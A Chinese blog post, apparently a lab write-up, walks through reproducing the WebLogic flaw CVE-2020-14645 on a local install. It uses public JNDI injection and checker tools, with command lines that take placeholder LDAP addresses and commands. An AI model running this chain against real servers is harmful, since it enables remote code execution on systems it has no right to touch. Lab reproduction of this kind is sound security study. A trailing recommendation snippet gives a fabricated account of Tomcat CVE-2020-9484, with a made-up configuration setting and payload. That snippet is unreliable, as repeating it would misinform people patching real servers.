CVE-2020-14645漏洞本地复现

CVE-2020-14645是一个weblogic远程代码执行漏洞。

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

环境搭建

下载地址:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

在这里插入图片描述
这里可能需要登录oracle账号才能下载,我这里有某度网盘,大家可以下载:提取码:2021

下载完成后安装:

java -jar fmw_14.1.1.0.0_wls_lite_generic.jar

注意这里如果报错,可以这样解决:

fmw_14.1.1.0.0_wls_lite_generic.jar移到java目录的jdk/bin文件夹下,在当前目录下管理员权限打开cmd执行上面命令即可~

如果无法解决,查看自己的jdk版本是否支持安装

前边直接点击下一步,这里注意,选择含实例的完整安装:
在这里插入图片描述
然后下一步,开始安装:
在这里插入图片描述
这里等待一会~
在这里插入图片描述
打√,然后点完成。
口令啥的自己设置,端口没有特殊需求可以默认

完成之后点击右下角启动域,打√,等一会系统默认浏览器启动:
在这里插入图片描述
点击右上角:
在这里插入图片描述
出现这个即成功~

搭好环境,开始复现漏洞:

工具下载:

https://github.com/welk1n/JNDI-Injection-Exploit

1、有直接打包好的jar包:
点击这里直接下载

2、在linux虚拟机里边下载:

(这个地方比较对于新手不是很友好,因为下载下来需要自己打包,我来填这个坑 😃)

git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
cd JNDI-Injection-Exploit
mvn clean package -DskipTests

然后就报错了:
在这里插入图片描述
这里需要安装maven这个算是插件框架

Mvn是开发人员比较常用的一个项目管理工具,主要是对项目的创建,编译,打包操作,命令简单使用

apt-get install maven

安装成功后,执行:

mvn clean package -DskipTests

注:上边这条命令要在下载好的工具目录下执行

会有一长段内容,是在自己下载配置环境啥的,不用理会~

这个时候

ls -l

在这里插入图片描述
就能发现我们想要的东西了。
继续:

但是漏洞环境我们是在Windows上搭建的,emmmm,我们还是把target文件夹拿到Windows下来再执行吧,不会的同学点击这里,有我之前写的上传下载命令,可以在虚机和本地传文件,实在不行的同学可以直接虚机安装vmtools,安装vmtools的教程点击这里,在文件夹找到对应文件夹,复制粘贴到本地也可以。

接下来:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

在这里插入图片描述
使用CVE-2020-14645漏洞验证工具:

https://github.com/DSO-Lab/defvul

这个也需要打包,可以根据上边的打包方法在linux下下载打包:

cd defvul-master/CVE-2020-14645_Weblogic/
mvn package

然后通过上边的方法将其拿到本地物理机:
CVE-2020-14645_Weblogic\target目录下
执行:

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

在这里插入图片描述
注意:ldap_ip和port是第一个工具生成的,后边的weblogic_url是浏览器的
弹出:
在这里插入图片描述
·
·
·
·
·
·
·
·

<小白初试,路过大佬多多指教,谢谢>

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2020-9484是Apache Tomcat容器中的一种身份验证绕过漏洞。要复现漏洞,我们需要满足以下条件: 1. 安装Apache Tomcat服务器:首先需要在本地或远程环境中安装Apache Tomcat服务器。确保Tomcat版本为9.0.0.M1至9.0.0.30。 2. 配置Tomcat服务器:在Tomcat的配置文件中(通常是server.xml),需要启用HTTP Connector属性中的restEnabled参数。该参数默认为false,我们需要将其设置为true。 3. 修改用户配置文件:在Tomcat配置文件的users节点中,添加一个或多个用户。为了复现漏洞,我们需要至少添加一个用户名为test的用户及其密码。 4. 启动Tomcat服务器:启动Tomcat服务器,确保它在本地或远程环境中运行。 5. 发起请求攻击:使用任何Web请求工具(如curl、Postman等),构造以下HTTP请求: POST /servlets-examples/servlet/RequestParamExample HTTP/1.1 Host: [Tomcat服务器IP地址]:[Tomcat服务器端口号] Content-Length: [content-length] Transfer-Encoding: [transfer-encoding] attName=%25%7B%25+%27test%27%2e%25+%27class%27%7d 其中,[Tomcat服务器IP地址]替换为Tomcat服务器的实际IP地址,[Tomcat服务器端口号]替换为Tomcat服务器的实际端口号,[content-length]和[transfer-encoding]分别为请求体的长度和编码方式。 6. 漏洞验证:如果成功复现漏洞,我们将获得类似以下的服务器响应: HTTP/1.1 200 OK [其他响应头信息] Content-Type: text/html;charset=UTF-8 [其他响应体信息] ${%27test%27.class} 如果响应体中包含"${'test'.class}"的引用,则漏洞已成功复现。这说明攻击者绕过了身份验证,并成功执行了恶意代码。 需要注意的是,CVE-2020-9484漏洞可能会导致未经授权的远程代码执行,攻击者可以利用此漏洞来执行任意代码,可能导致服务器受到严重影响。在验证漏洞后,建议尽快升级Tomcat服务器,安装相应的补丁或增加其他安全措施,以避免潜在的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值